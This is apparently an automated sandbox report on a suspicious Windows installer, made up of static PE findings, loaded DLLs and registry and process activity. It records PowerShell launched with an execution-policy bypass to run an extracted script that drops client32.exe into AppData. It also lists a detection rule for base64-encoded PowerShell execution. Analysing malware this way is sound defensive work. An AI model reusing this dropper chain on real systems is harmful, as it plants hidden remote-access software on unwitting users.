Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_11163C55	8_2_11163C55
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_1108A260	8_2_1108A260
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_11050430	8_2_11050430
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_11072460	8_2_11072460
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_110088DB	8_2_110088DB
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_1101CBE0	8_2_1101CBE0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_11032A60	8_2_11032A60
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_11086DA0	8_2_11086DA0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_11044C60	8_2_11044C60

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

Process token adjusted: Security

Jump to behavior

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: String function: 68C630A0 appears 34 times
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: String function: 68C77D00 appears 87 times
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: String function: 68C77A90 appears 43 times
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: String function: 1113F670 appears 32 times
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: String function: 11142A60 appears 1204 times
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: String function: 68C66F50 appears 123 times
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: String function: 11080C50 appears 76 times
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: String function: 1116B7E0 appears 55 times
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: String function: 1115CBB3 appears 93 times
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: String function: 110290F0 appears 2125 times
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: String function: 1105D340 appears 612 times
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: String function: 1109CBD0 appears 32 times
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: String function: 111434D0 appears 50 times
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: String function: 1105D470 appears 65 times
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: String function: 11027550 appears 94 times
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: String function: 11160790 appears 64 times

Source: KC0uZWwr8p.exe

Static PE information: invalid certificate

Source: KC0uZWwr8p.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-EFF8I.tmp.2.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows

Source: KC0uZWwr8p.tmp.0.dr	Static PE information: Number of sections : 11 > 10
Source: is-EFF8I.tmp.2.dr	Static PE information: Number of sections : 11 > 10
Source: KC0uZWwr8p.exe	Static PE information: Number of sections : 11 > 10

Source: is-2U0U8.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-PK80C.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-RN6EP.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-BQO9P.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-806EH.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-075U6.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-EU182.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-0TGAP.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-3CKII.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-Q7LP1.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-8T81V.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-KE7IL.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-L306R.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-NS45S.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-4OBJP.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-133UG.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-UFHDJ.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-95T15.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-N0NN5.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-QFJMG.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-BLUTK.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-70A69.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-HN5GF.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-GFAIP.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-7BDCE.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-6E54C.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-9LCE6.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-R0Q1K.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-43K8A.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-6IECG.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-7UFVB.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-2K0TF.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-RR8GH.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-8A8B0.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-INF7O.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-6P215.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-A5E7F.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-FPRGF.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-VKO3B.tmp.2.dr	Static PE information: No import functions for PE file found
Source: is-P5532.tmp.2.dr	Static PE information: No import functions for PE file found

Source: KC0uZWwr8p.exe, 00000000.00000000.1286446452.0000000000DB9000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileName vs KC0uZWwr8p.exe
Source: KC0uZWwr8p.exe, 00000000.00000003.1292506681.00000000036AF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs KC0uZWwr8p.exe
Source: KC0uZWwr8p.exe, 00000000.00000003.1293120278.000000007F22B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs KC0uZWwr8p.exe
Source: KC0uZWwr8p.exe	Binary or memory string: OriginalFileName vs KC0uZWwr8p.exe

Source: KC0uZWwr8p.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: amsi32_7320.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7320, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal60.rans.spre.troj.evad.winEXE@10/299@3/3

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

Code function: 6_2_11059270 GetLastError,FormatMessageA,LocalFree,

6_2_11059270

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_1109C750 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,	6_2_1109C750
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_1109C7E0 AdjustTokenPrivileges,CloseHandle,	6_2_1109C7E0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_1109C750 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,	8_2_1109C750
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_1109C7E0 AdjustTokenPrivileges,CloseHandle,	8_2_1109C7E0

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

Code function: 6_2_11095C90 GetTickCount,CoInitialize,CLSIDFromProgID,CoCreateInstance,CoUninitialize,

6_2_11095C90

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

Code function: 6_2_11088290 FindResourceA,LoadResource,LockResource,

6_2_11088290

Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp

File created: C:\Program Files (x86)\Advanced IP Scanner

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\installPackage.zip

Jump to behavior

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7308:120:WilError_03

Source: C:\Users\user\Desktop\KC0uZWwr8p.exe

File created: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp

Jump to behavior

Source: C:\Users\user\Desktop\KC0uZWwr8p.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\KC0uZWwr8p.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp

File read: C:\Program Files (x86)\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\KC0uZWwr8p.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: KC0uZWwr8p.exe

ReversingLabs: Detection: 15%

Source: KC0uZWwr8p.exe

String found in binary or memory: /LOADINF="filename"

Source: C:\Users\user\Desktop\KC0uZWwr8p.exe

File read: C:\Users\user\Desktop\KC0uZWwr8p.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\KC0uZWwr8p.exe "C:\Users\user\Desktop\KC0uZWwr8p.exe"
Source: C:\Users\user\Desktop\KC0uZWwr8p.exe	Process created: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp "C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp" /SL5="$20454,18032967,815616,C:\Users\user\Desktop\KC0uZWwr8p.exe"
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-LP9OQ.tmp\ExtractedContent.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe "C:\Users\user\AppData\Roaming\SystemUtil\client32.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe "C:\Users\user\AppData\Roaming\SystemUtil\client32.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe "C:\Users\user\AppData\Roaming\SystemUtil\client32.exe"
Source: C:\Users\user\Desktop\KC0uZWwr8p.exe	Process created: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp "C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp" /SL5="$20454,18032967,815616,C:\Users\user\Desktop\KC0uZWwr8p.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-LP9OQ.tmp\ExtractedContent.ps1"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe "C:\Users\user\AppData\Roaming\SystemUtil\client32.exe"	Jump to behavior

Source: C:\Users\user\Desktop\KC0uZWwr8p.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\KC0uZWwr8p.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: pcihooks.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: riched32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: pciinv.dll	Jump to behavior
